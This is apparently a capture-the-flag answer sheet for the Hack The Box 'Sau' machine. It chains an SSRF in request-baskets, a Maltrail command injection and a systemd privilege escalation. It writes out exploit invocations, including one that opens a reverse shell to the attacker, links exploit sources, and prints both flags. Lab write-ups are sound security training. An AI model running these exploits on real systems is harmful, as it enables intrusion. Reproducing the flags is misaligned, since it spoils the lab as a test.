Guided:
Q: Which is the highest open TCP port on the target machine?
A: 55555

Q: What is the name of the open source software that the application on 55555 is "powered by"?
A: request-baskets
(can be seen at the bottom of the web-page on port 55555)

Q: What is the version of request-baskets running on Sau?
A: 1.2.1

Q: What is the 2023 CVE ID for a Server-Side Request Forgery (SSRF) in this version of request-baskets?
A: CVE-2023-27163 ----> https://sploitus.com/exploit?id=6BAA524E-16EA-562C-804B-113B8244C6EA
|----------------------> ./CVE-2023-27163.sh -t http://10.129.229.26:55555 -a http://127.0.0.1:80
 

Q: What is the name of the software that the application running on port 80 is "powered by"?
A: Maltrail       (v.0.53)

Q: There is an unauthenticated command injection vulnerability in MailTrail v0.53. What is the relative path targeted by this exploit?
A: /login
Note: Hint was given here -> https://github.com/spookier/Maltrail-v0.53-Exploit
python3 exploit.py <my-ip> <my-port> http://10.129.229.26:55555/aiwqmw

Q: What user is the Mailtrack application running as on Sau?
A: Puma

Q: Submit the flag located in the puma user's home directory.
A: 6e1deb15f20758d7a87c185c5ceafba0

Q: What is the full path to the application the user puma can run as root on Sau?
A: /usr/bin/systemctl

Q: What is the full version string for the instance of systemd installed on Sau?
A: systemd 245 (245.4-4ubuntu3.22)
  systemd --version    |or|    systemctl --version

Q: What is the CVE ID for a local privilege escalation vulnerability that affects that particular systemd version?
A: CVE-2023-26604
Note: Found this gem -> https://packetstormsecurity.com/files/174130/systemd-246-Local-Root-Privilege-Escalation.html

Q: Submit the flag located in the root user's home directory.
A: f71ed79c4dc47ebebb5a63c2a2b2e31e

